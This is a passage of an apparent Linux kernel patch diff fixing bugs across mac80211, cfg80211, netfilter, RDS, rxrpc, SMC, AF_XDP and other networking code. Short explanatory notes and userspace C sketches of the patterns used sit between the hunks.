+ void ieee80211_color_change_finish(struct ieee80211_vif *vif)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
+@@ -4636,11 +4650,21 @@ ieeee80211_obss_color_collision_notify(struct ieee80211_vif *vif,
+ 				       u64 color_bitmap, gfp_t gfp)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
++	struct ieee80211_link_data *link = &sdata->deflink;
+ 
+ 	if (sdata->vif.bss_conf.color_change_active || sdata->vif.bss_conf.csa_active)
+ 		return;
+ 
+-	cfg80211_obss_color_collision_notify(sdata->dev, color_bitmap, gfp);
++	if (delayed_work_pending(&link->color_collision_detect_work))
++		return;
++
++	link->color_bitmap = color_bitmap;
++	/* queue the color collision detection event every 500 ms in order to
++	 * avoid sending too many netlink messages to userspace.
++	 */
++	ieee80211_queue_delayed_work(&sdata->local->hw,
++				     &link->color_collision_detect_work,
++				     msecs_to_jiffies(500));
+ }
+ EXPORT_SYMBOL_GPL(ieeee80211_obss_color_collision_notify);
+ 
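
The effect of the mac80211 change above is to debounce collision reports: the first event arms a 500 ms delayed work carrying its bitmap, and any event arriving while that work is pending is dropped, so at most one notification per window reaches userspace. A userspace sketch of the same throttling idea with hypothetical names, using a monotonic timestamp instead of a workqueue; unlike the patch, which defers the report by the full interval, this variant delivers immediately and suppresses followers:

	#include <stdbool.h>
	#include <stdint.h>
	#include <stdio.h>
	#include <time.h>

	#define NOTIFY_INTERVAL_MS 500

	static uint64_t now_ms(void)
	{
		struct timespec ts;

		clock_gettime(CLOCK_MONOTONIC, &ts);
		return (uint64_t)ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
	}

	/* Forward at most one notification per NOTIFY_INTERVAL_MS; events
	 * inside the window are suppressed, mirroring the
	 * delayed_work_pending() check in the hunk above.
	 */
	static bool rate_limited_notify(uint64_t bitmap)
	{
		static uint64_t last_ms;
		uint64_t now = now_ms();

		if (last_ms && now - last_ms < NOTIFY_INTERVAL_MS)
			return false;		/* still within the window: drop */
		last_ms = now;
		printf("notify userspace, bitmap=%#llx\n",
		       (unsigned long long)bitmap);
		return true;
	}

	int main(void)
	{
		rate_limited_notify(0x3);	/* delivered */
		rate_limited_notify(0x7);	/* suppressed: < 500 ms later */
		return 0;
	}
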
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index d16606e84e22d..7ca9bde3c6d25 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -974,6 +974,8 @@ struct ieee80211_link_data {
+ 	struct cfg80211_chan_def csa_chandef;
+ 
+ 	struct work_struct color_change_finalize_work;
++	struct delayed_work color_collision_detect_work;
++	u64 color_bitmap;
+ 
+ 	/* context reservation -- protected with chanctx_mtx */
+ 	struct ieee80211_chanctx *reserved_chanctx;
+@@ -1929,6 +1931,7 @@ int ieee80211_channel_switch(struct wiphy *wiphy, struct net_device *dev,
+ 
+ /* color change handling */
+ void ieee80211_color_change_finalize_work(struct work_struct *work);
++void ieee80211_color_collision_detection_work(struct work_struct *work);
+ 
+ /* interface handling */
+ #define MAC80211_SUPPORTED_FEATURES_TX	(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM | \
+diff --git a/net/mac80211/link.c b/net/mac80211/link.c
+index d1f5a9f7c6470..8c8869cc1fb4c 100644
+--- a/net/mac80211/link.c
++++ b/net/mac80211/link.c
+@@ -39,6 +39,8 @@ void ieee80211_link_init(struct ieee80211_sub_if_data *sdata,
+ 		  ieee80211_csa_finalize_work);
+ 	INIT_WORK(&link->color_change_finalize_work,
+ 		  ieee80211_color_change_finalize_work);
++	INIT_DELAYED_WORK(&link->color_collision_detect_work,
++			  ieee80211_color_collision_detection_work);
+ 	INIT_LIST_HEAD(&link->assigned_chanctx_list);
+ 	INIT_LIST_HEAD(&link->reserved_chanctx_list);
+ 	INIT_DELAYED_WORK(&link->dfs_cac_timer_work,
+@@ -66,6 +68,7 @@ void ieee80211_link_stop(struct ieee80211_link_data *link)
+ 	if (link->sdata->vif.type == NL80211_IFTYPE_STATION)
+ 		ieee80211_mgd_stop_link(link);
+ 
++	cancel_delayed_work_sync(&link->color_collision_detect_work);
+ 	ieee80211_link_release_channel(link);
+ }
+ 
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index c6562a6d25035..1ed345d072b3f 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4052,9 +4052,6 @@ static void ieee80211_invoke_rx_handlers(struct ieee80211_rx_data *rx)
+ static bool
+ ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
+ {
+-	if (!sta->mlo)
+-		return false;
+-
+ 	return !!(sta->valid_links & BIT(link_id));
+ }
+ 
+@@ -4076,13 +4073,8 @@ static bool ieee80211_rx_data_set_link(struct ieee80211_rx_data *rx,
+ }
+ 
+ static bool ieee80211_rx_data_set_sta(struct ieee80211_rx_data *rx,
+-				      struct ieee80211_sta *pubsta,
+-				      int link_id)
++				      struct sta_info *sta, int link_id)
+ {
+-	struct sta_info *sta;
+-
+-	sta = container_of(pubsta, struct sta_info, sta);
+-
+ 	rx->link_id = link_id;
+ 	rx->sta = sta;
+ 
+@@ -4120,7 +4112,7 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ 	if (sta->sta.valid_links)
+ 		link_id = ffs(sta->sta.valid_links) - 1;
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		return;
+ 
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+@@ -4166,7 +4158,7 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, -1))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, -1))
+ 		return;
+ 
+ 	rcu_read_lock();
+@@ -4843,7 +4835,8 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	}
+ 
+-	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
++	if (unlikely(rx->sta && rx->sta->sta.mlo) &&
++	    is_unicast_ether_addr(hdr->addr1)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+@@ -4873,6 +4866,7 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 	struct ieee80211_fast_rx *fast_rx;
+ 	struct ieee80211_rx_data rx;
++	struct sta_info *sta;
+ 	int link_id = -1;
+ 
+ 	memset(&rx, 0, sizeof(rx));
+@@ -4900,7 +4894,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	 * link_id is used only for stats purpose and updating the stats on
+ 	 * the deflink is fine?
+ 	 */
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++	sta = container_of(pubsta, struct sta_info, sta);
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		goto drop;
+ 
+ 	fast_rx = rcu_dereference(rx.sta->fast_rx);
+@@ -4940,7 +4935,7 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ 			link_id = status->link_id;
+ 	}
+ 
+-	if (!ieee80211_rx_data_set_sta(rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(rx, sta, link_id))
+ 		return false;
+ 
+ 	return ieee80211_prepare_and_rx_handle(rx, skb, consume);
+@@ -5007,7 +5002,8 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			link_id = status->link_id;
+ 
+ 		if (pubsta) {
+-			if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++			sta = container_of(pubsta, struct sta_info, sta);
++			if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 				goto out;
+ 
+ 			/*
+@@ -5044,8 +5040,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			}
+ 
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+@@ -5058,8 +5053,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 
+ 		if (prev_sta) {
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 04e0f132b1d9c..34cb833db25f5 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2411,7 +2411,7 @@ static void sta_stats_decode_rate(struct ieee80211_local *local, u32 rate,
+ 
+ static int sta_set_rate_info_rx(struct sta_info *sta, struct rate_info *rinfo)
+ {
+-	u16 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
++	u32 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
+ 
+ 	if (rate == STA_STATS_RATE_INVALID)
+ 		return -EINVAL;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index defe97a31724d..7699fb4106701 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -4434,7 +4434,7 @@ static void ieee80211_mlo_multicast_tx(struct net_device *dev,
+ 	u32 ctrl_flags = IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX;
+ 
+ 	if (hweight16(links) == 1) {
+-		ctrl_flags |= u32_encode_bits(ffs(links) - 1,
++		ctrl_flags |= u32_encode_bits(__ffs(links),
+ 					      IEEE80211_TX_CTRL_MLO_LINK);
+ 
+ 		__ieee80211_subif_start_xmit(skb, sdata->dev, 0, ctrl_flags,
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8c09e4d12ac1e..fc8256b00b320 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6999,6 +6999,9 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 
+ 		type = __nft_obj_type_get(objtype);
++		if (WARN_ON_ONCE(!type))
++			return -ENOENT;
++
+ 		nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+ 		return nf_tables_updobj(&ctx, type, nla[NFTA_OBJ_DATA], obj);
+diff --git a/net/rds/message.c b/net/rds/message.c
+index c19c935612278..7af59d2443e5d 100644
+--- a/net/rds/message.c
++++ b/net/rds/message.c
+@@ -118,7 +118,7 @@ static void rds_rm_zerocopy_callback(struct rds_sock *rs,
+ 	ck = &info->zcookies;
+ 	memset(ck, 0, sizeof(*ck));
+ 	WARN_ON(!rds_zcookie_add(info, cookie));
+-	list_add_tail(&q->zcookie_head, &info->rs_zcookie_next);
++	list_add_tail(&info->rs_zcookie_next, &q->zcookie_head);
+ 
+ 	spin_unlock_irqrestore(&q->lock, flags);
+ 	/* caller invokes rds_wake_sk_sleep() */
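
The one-line rds fix above swaps the arguments of list_add_tail(): the kernel signature is list_add_tail(new, head), so the original call spliced the queue head onto the cookie entry instead of appending the entry to the queue. A compact userspace re-implementation of the circular list shows the convention:

	#include <stddef.h>
	#include <stdio.h>

	struct list_head { struct list_head *next, *prev; };

	#define LIST_HEAD_INIT(name) { &(name), &(name) }

	/* Same semantics as the kernel helper: insert @new before @head,
	 * i.e. at the tail of the list that @head anchors.
	 */
	static void list_add_tail(struct list_head *new, struct list_head *head)
	{
		new->prev = head->prev;
		new->next = head;
		head->prev->next = new;
		head->prev = new;
	}

	struct cookie { int id; struct list_head node; };

	int main(void)
	{
		struct list_head q = LIST_HEAD_INIT(q);
		struct cookie a = { .id = 1 }, b = { .id = 2 };

		list_add_tail(&a.node, &q);	/* correct: entry first, head second */
		list_add_tail(&b.node, &q);

		for (struct list_head *p = q.next; p != &q; p = p->next) {
			struct cookie *c = (struct cookie *)
				((char *)p - offsetof(struct cookie, node));
			printf("cookie %d\n", c->id);
		}
		return 0;
	}
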
+diff --git a/net/rxrpc/call_object.c b/net/rxrpc/call_object.c
+index f3c9f0201c156..7ce562f6dc8d5 100644
+--- a/net/rxrpc/call_object.c
++++ b/net/rxrpc/call_object.c
+@@ -54,12 +54,14 @@ void rxrpc_poke_call(struct rxrpc_call *call, enum rxrpc_call_poke_trace what)
+ 		spin_lock_bh(&local->lock);
+ 		busy = !list_empty(&call->attend_link);
+ 		trace_rxrpc_poke_call(call, busy, what);
++		if (!busy && !rxrpc_try_get_call(call, rxrpc_call_get_poke))
++			busy = true;
+ 		if (!busy) {
+-			rxrpc_get_call(call, rxrpc_call_get_poke);
+ 			list_add_tail(&call->attend_link, &local->call_attend_q);
+ 		}
+ 		spin_unlock_bh(&local->lock);
+-		rxrpc_wake_up_io_thread(local);
++		if (!busy)
++			rxrpc_wake_up_io_thread(local);
+ 	}
+ }
+ 
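
The rxrpc hunk above only queues the call for attention once rxrpc_try_get_call() has actually obtained a reference, closing the race where a poke could be queued against a call whose last reference was already gone. The primitive underneath is a "get unless already zero" increment (refcount_inc_not_zero() in the kernel); a userspace sketch with C11 atomics:

	#include <stdatomic.h>
	#include <stdbool.h>
	#include <stdio.h>

	struct obj { atomic_int refs; };

	/* Take a reference only if the object is still alive (refs > 0);
	 * mirrors refcount_inc_not_zero(). Returns false once a concurrent
	 * release has dropped the count to zero.
	 */
	static bool try_get(struct obj *o)
	{
		int r = atomic_load(&o->refs);

		do {
			if (r == 0)
				return false;	/* already dying: don't resurrect */
		} while (!atomic_compare_exchange_weak(&o->refs, &r, r + 1));
		return true;
	}

	int main(void)
	{
		struct obj o = { .refs = 1 };

		printf("try_get: %d (refs=%d)\n", try_get(&o),
		       atomic_load(&o.refs));
		atomic_store(&o.refs, 0);		/* simulate the final put */
		printf("try_get: %d\n", try_get(&o));	/* now refuses */
		return 0;
	}
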
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e12d4fa5aece6..d9413d43b1045 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1826,8 +1826,10 @@ static int smcr_serv_conf_first_link(struct smc_sock *smc)
+ 	smc_llc_link_active(link);
+ 	smcr_lgr_set_type(link->lgr, SMC_LGR_SINGLE);
+ 
++	mutex_lock(&link->lgr->llc_conf_mutex);
+ 	/* initial contact - try to establish second link */
+ 	smc_llc_srv_add_link(link, NULL);
++	mutex_unlock(&link->lgr->llc_conf_mutex);
+ 	return 0;
+ }
+ 
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c305d8dd23f80..c19d4b7c1f28a 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1120,8 +1120,9 @@ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 
+ 		smc_buf_free(lgr, is_rmb, buf_desc);
+ 	} else {
+-		buf_desc->used = 0;
+-		memset(buf_desc->cpu_addr, 0, buf_desc->len);
++		/* memzero_explicit provides potential memory barrier semantics */
++		memzero_explicit(buf_desc->cpu_addr, buf_desc->len);
++		WRITE_ONCE(buf_desc->used, 0);
+ 	}
+ }
+ 
+@@ -1132,19 +1133,17 @@ static void smc_buf_unuse(struct smc_connection *conn,
+ 		if (!lgr->is_smcd && conn->sndbuf_desc->is_vm) {
+ 			smcr_buf_unuse(conn->sndbuf_desc, false, lgr);
+ 		} else {
+-			conn->sndbuf_desc->used = 0;
+-			memset(conn->sndbuf_desc->cpu_addr, 0,
+-			       conn->sndbuf_desc->len);
++			memzero_explicit(conn->sndbuf_desc->cpu_addr, conn->sndbuf_desc->len);
++			WRITE_ONCE(conn->sndbuf_desc->used, 0);
+ 		}
+ 	}
+ 	if (conn->rmb_desc) {
+ 		if (!lgr->is_smcd) {
+ 			smcr_buf_unuse(conn->rmb_desc, true, lgr);
+ 		} else {
+-			conn->rmb_desc->used = 0;
+-			memset(conn->rmb_desc->cpu_addr, 0,
+-			       conn->rmb_desc->len +
+-			       sizeof(struct smcd_cdc_msg));
++			memzero_explicit(conn->rmb_desc->cpu_addr,
++					 conn->rmb_desc->len + sizeof(struct smcd_cdc_msg));
++			WRITE_ONCE(conn->rmb_desc->used, 0);
+ 		}
+ 	}
+ }
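
Both smc hunks reverse the release order: scrub the buffer first, then publish used = 0, so a peer that sees the buffer as free can no longer observe the previous connection's data. A userspace analogue of the publish side, deliberately strengthened to an explicit release/acquire pair (the kernel relies on memzero_explicit() plus WRITE_ONCE() ordering instead):

	#include <stdatomic.h>
	#include <stdio.h>
	#include <string.h>

	struct buf {
		unsigned char data[64];
		atomic_int used;
	};

	/* Scrub first, then publish: the release store guarantees that any
	 * thread observing used == 0 via the acquire load below also sees
	 * the zeroed data, never the stale contents.
	 */
	static void buf_unuse(struct buf *b)
	{
		memset(b->data, 0, sizeof(b->data));
		atomic_store_explicit(&b->used, 0, memory_order_release);
	}

	static int buf_is_free(struct buf *b)
	{
		return !atomic_load_explicit(&b->used, memory_order_acquire);
	}

	int main(void)
	{
		struct buf b = { .data = { 0xde, 0xad }, .used = 1 };

		buf_unuse(&b);
		printf("free=%d first byte=%d\n", buf_is_free(&b), b.data[0]);
		return 0;
	}
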
+diff --git a/net/socket.c b/net/socket.c
+index c12af3c84d3a6..b4cdc576afc3f 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -449,7 +449,9 @@ static struct file_system_type sock_fs_type = {
+  *
+  *	Returns the &file bound with @sock, implicitly storing it
+  *	in sock->file. If dname is %NULL, sets to "".
+- *	On failure the return is a ERR pointer (see linux/err.h).
++ *
++ *	On failure @sock is released, and an ERR pointer is returned.
++ *
+  *	This function uses GFP_KERNEL internally.
+  */
+ 
+@@ -1613,7 +1615,6 @@ static struct socket *__sys_socket_create(int family, int type, int protocol)
+ struct file *__sys_socket_file(int family, int type, int protocol)
+ {
+ 	struct socket *sock;
+-	struct file *file;
+ 	int flags;
+ 
+ 	sock = __sys_socket_create(family, type, protocol);
+@@ -1624,11 +1625,7 @@ struct file *__sys_socket_file(int family, int type, int protocol)
+ 	if (SOCK_NONBLOCK != O_NONBLOCK && (flags & SOCK_NONBLOCK))
+ 		flags = (flags & ~SOCK_NONBLOCK) | O_NONBLOCK;
+ 
+-	file = sock_alloc_file(sock, flags, NULL);
+-	if (IS_ERR(file))
+-		sock_release(sock);
+-
+-	return file;
++	return sock_alloc_file(sock, flags, NULL);
+ }
+ 
+ int __sys_socket(int family, int type, int protocol)
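
With the socket.c change, sock_alloc_file() releases the socket itself on failure, so __sys_socket_file() can return its result directly instead of duplicating the error branch in every caller. A userspace sketch of that consume-on-failure ownership convention, with hypothetical names:

	#include <stdio.h>
	#include <stdlib.h>

	struct sock { int fd; };
	struct file { struct sock *private; };

	/* Consume-on-failure: ownership of @s transfers to this function.
	 * On error the sock is released here, so callers never need their
	 * own cleanup branch and can return the result directly.
	 */
	static struct file *sock_to_file(struct sock *s)
	{
		struct file *f = malloc(sizeof(*f));

		if (!f) {
			free(s);	/* released on behalf of the caller */
			return NULL;
		}
		f->private = s;
		return f;
	}

	static struct file *open_socket_file(void)
	{
		struct sock *s = malloc(sizeof(*s));

		if (!s)
			return NULL;
		s->fd = 3;
		return sock_to_file(s);	/* no error branch needed here */
	}

	int main(void)
	{
		struct file *f = open_socket_file();

		if (f) {
			printf("fd=%d\n", f->private->fd);
			free(f->private);
			free(f);
		}
		return 0;
	}
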
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 0b0b9f1eed469..fd7e1c630493e 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -3350,6 +3350,8 @@ rpc_clnt_swap_deactivate_callback(struct rpc_clnt *clnt,
+ void
+ rpc_clnt_swap_deactivate(struct rpc_clnt *clnt)
+ {
++	while (clnt != clnt->cl_parent)
++		clnt = clnt->cl_parent;
+ 	if (atomic_dec_if_positive(&clnt->cl_swapper) == 0)
+ 		rpc_clnt_iterate_for_each_xprt(clnt,
+ 				rpc_clnt_swap_deactivate_callback, NULL);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 33a82ecab9d56..02b9a0280896c 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -13809,7 +13809,7 @@ static int nl80211_set_rekey_data(struct sk_buff *skb, struct genl_info *info)
+ 		return -ERANGE;
+ 	if (nla_len(tb[NL80211_REKEY_DATA_KCK]) != NL80211_KCK_LEN &&
+ 	    !(rdev->wiphy.flags & WIPHY_FLAG_SUPPORTS_EXT_KEK_KCK &&
+-	      nla_len(tb[NL80211_REKEY_DATA_KEK]) == NL80211_KCK_EXT_LEN))
++	      nla_len(tb[NL80211_REKEY_DATA_KCK]) == NL80211_KCK_EXT_LEN))
+ 		return -ERANGE;
+ 
+ 	rekey_data.kek = nla_data(tb[NL80211_REKEY_DATA_KEK]);
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 4b5b6ee0fe013..4f813e346a8bc 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -285,6 +285,15 @@ void cfg80211_conn_work(struct work_struct *work)
+ 	wiphy_unlock(&rdev->wiphy);
+ }
+ 
++static void cfg80211_step_auth_next(struct cfg80211_conn *conn,
++				    struct cfg80211_bss *bss)
++{
++	memcpy(conn->bssid, bss->bssid, ETH_ALEN);
++	conn->params.bssid = conn->bssid;
++	conn->params.channel = bss->channel;
++	conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++}
++
+ /* Returned bss is reference counted and must be cleaned up appropriately. */
+ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ {
+@@ -302,10 +311,7 @@ static struct cfg80211_bss *cfg80211_get_conn_bss(struct wireless_dev *wdev)
+ 	if (!bss)
+ 		return NULL;
+ 
+-	memcpy(wdev->conn->bssid, bss->bssid, ETH_ALEN);
+-	wdev->conn->params.bssid = wdev->conn->bssid;
+-	wdev->conn->params.channel = bss->channel;
+-	wdev->conn->state = CFG80211_CONN_AUTHENTICATE_NEXT;
++	cfg80211_step_auth_next(wdev->conn, bss);
+ 	schedule_work(&rdev->conn_work);
+ 
+ 	return bss;
+@@ -597,7 +603,12 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	wdev->conn->params.ssid_len = wdev->u.client.ssid_len;
+ 
+ 	/* see if we have the bss already */
+-	bss = cfg80211_get_conn_bss(wdev);
++	bss = cfg80211_get_bss(wdev->wiphy, wdev->conn->params.channel,
++			       wdev->conn->params.bssid,
++			       wdev->conn->params.ssid,
++			       wdev->conn->params.ssid_len,
++			       wdev->conn_bss_type,
++			       IEEE80211_PRIVACY(wdev->conn->params.privacy));
+ 
+ 	if (prev_bssid) {
+ 		memcpy(wdev->conn->prev_bssid, prev_bssid, ETH_ALEN);
+@@ -608,6 +619,7 @@ static int cfg80211_sme_connect(struct wireless_dev *wdev,
+ 	if (bss) {
+ 		enum nl80211_timeout_reason treason;
+ 
++		cfg80211_step_auth_next(wdev->conn, bss);
+ 		err = cfg80211_conn_do_work(wdev, &treason);
+ 		cfg80211_put_bss(wdev->wiphy, bss);
+ 	} else {
+@@ -724,6 +736,7 @@ void __cfg80211_connect_result(struct net_device *dev,
+ {
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	const struct element *country_elem = NULL;
++	const struct element *ssid;
+ 	const u8 *country_data;
+ 	u8 country_datalen;
+ #ifdef CONFIG_CFG80211_WEXT
+@@ -883,6 +896,22 @@ void __cfg80211_connect_result(struct net_device *dev,
+ 				   country_data, country_datalen);
+ 	kfree(country_data);
+ 
++	if (!wdev->u.client.ssid_len) {
++		rcu_read_lock();
++		for_each_valid_link(cr, link) {
++			ssid = ieee80211_bss_get_elem(cr->links[link].bss,
++						      WLAN_EID_SSID);
++
++			if (!ssid || !ssid->datalen)
++				continue;
++
++			memcpy(wdev->u.client.ssid, ssid->data, ssid->datalen);
++			wdev->u.client.ssid_len = ssid->datalen;
++			break;
++		}
++		rcu_read_unlock();
++	}
++
+ 	return;
+ out:
+ 	for_each_valid_link(cr, link)
+@@ -1468,6 +1497,15 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 	} else {
+ 		if (WARN_ON(connkeys))
+ 			return -EINVAL;
++
++		/* connect can point to wdev->wext.connect which
++		 * can hold key data from a previous connection
++		 */
++		connect->key = NULL;
++		connect->key_len = 0;
++		connect->key_idx = 0;
++		connect->crypto.cipher_group = 0;
++		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;
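
The cfg80211 hunk above exists because connect may alias the long-lived wdev->wext.connect structure, so key material from a previous WEP attempt would otherwise leak into the next request. The general defensive pattern when reusing a cached request structure, sketched with a hypothetical struct:

	#include <stddef.h>
	#include <stdio.h>

	struct connect_req {
		const unsigned char *key;	/* may point at per-device storage */
		size_t key_len;
		int key_idx;
	};

	/* Reusing a cached request: scrub every field that can carry state
	 * from the previous attempt before filling in the new one.
	 */
	static void reset_stale_key_state(struct connect_req *req)
	{
		req->key = NULL;
		req->key_len = 0;
		req->key_idx = 0;
	}

	int main(void)
	{
		static unsigned char old_key[] = { 0xde, 0xad };
		struct connect_req req = { old_key, sizeof(old_key), 1 };

		reset_stale_key_state(&req);	/* next connect starts clean */
		printf("key=%p len=%zu\n", (void *)req.key, req.key_len);
		return 0;
	}
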
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 9f0561b67c12e..13f62d2402e71 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -511,7 +511,7 @@ static struct sk_buff *xsk_build_skb(struct xdp_sock *xs,
+ 	return skb;
+ }
+ 
+-static int xsk_generic_xmit(struct sock *sk)
++static int __xsk_generic_xmit(struct sock *sk)
+ {
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	u32 max_batch = TX_BATCH_SIZE;
+@@ -594,22 +594,13 @@ out:
+ 	return err;
+ }
+ 
+-static int xsk_xmit(struct sock *sk)
++static int xsk_generic_xmit(struct sock *sk)
+ {
+-	struct xdp_sock *xs = xdp_sk(sk);
+ 	int ret;
+ 
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
+-	if (unlikely(!xs->tx))
+-		return -ENOBUFS;
+-
+-	if (xs->zc)
+-		return xsk_wakeup(xs, XDP_WAKEUP_TX);
+-
+ 	/* Drop the RCU lock since the SKB path might sleep. */
+ 	rcu_read_unlock();
+-	ret = xsk_generic_xmit(sk);
++	ret = __xsk_generic_xmit(sk);
+ 	/* Reaquire RCU lock before going into common code. */
+ 	rcu_read_lock();
+ 
+@@ -627,17 +618,31 @@ static bool xsk_no_wakeup(struct sock *sk)
+ #endif
+ }
+ 
++static int xsk_check_common(struct xdp_sock *xs)
++{
++	if (unlikely(!xsk_is_bound(xs)))
++		return -ENXIO;
++	if (unlikely(!(xs->dev->flags & IFF_UP)))
++		return -ENETDOWN;
++
++	return 0;
++}
++
+ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len)
+ {
+ 	bool need_wait = !(m->msg_flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	struct xsk_buff_pool *pool;
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(need_wait))
+ 		return -EOPNOTSUPP;
++	if (unlikely(!xs->tx))
++		return -ENOBUFS;
+ 
+ 	if (sk_can_busy_loop(sk)) {
+ 		if (xs->zc)
+@@ -649,8 +654,11 @@ static int __xsk_sendmsg(struct socket *sock, struct msghdr *m, size_t total_len
+ 		return 0;
+ 
+ 	pool = xs->pool;
+-	if (pool->cached_need_wakeup & XDP_WAKEUP_TX)
+-		return xsk_xmit(sk);
++	if (pool->cached_need_wakeup & XDP_WAKEUP_TX) {
++		if (xs->zc)
++			return xsk_wakeup(xs, XDP_WAKEUP_TX);
++		return xsk_generic_xmit(sk);
++	}
+ 	return 0;
+ }
+ 
+@@ -670,11 +678,11 @@ static int __xsk_recvmsg(struct socket *sock, struct msghdr *m, size_t len, int
+ 	bool need_wait = !(flags & MSG_DONTWAIT);
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
++	int err;
+ 
+-	if (unlikely(!xsk_is_bound(xs)))
+-		return -ENXIO;
+-	if (unlikely(!(xs->dev->flags & IFF_UP)))
+-		return -ENETDOWN;
++	err = xsk_check_common(xs);
++	if (err)
++		return err;
+ 	if (unlikely(!xs->rx))
+ 		return -ENOBUFS;
+ 	if (unlikely(need_wait))
+@@ -713,21 +721,20 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 	sock_poll_wait(file, sock, wait);
+ 
+ 	rcu_read_lock();
+-	if (unlikely(!xsk_is_bound(xs))) {
+-		rcu_read_unlock();
+-		return mask;
+-	}
++	if (xsk_check_common(xs))
++		goto skip_tx;
+ 
+ 	pool = xs->pool;
+ 
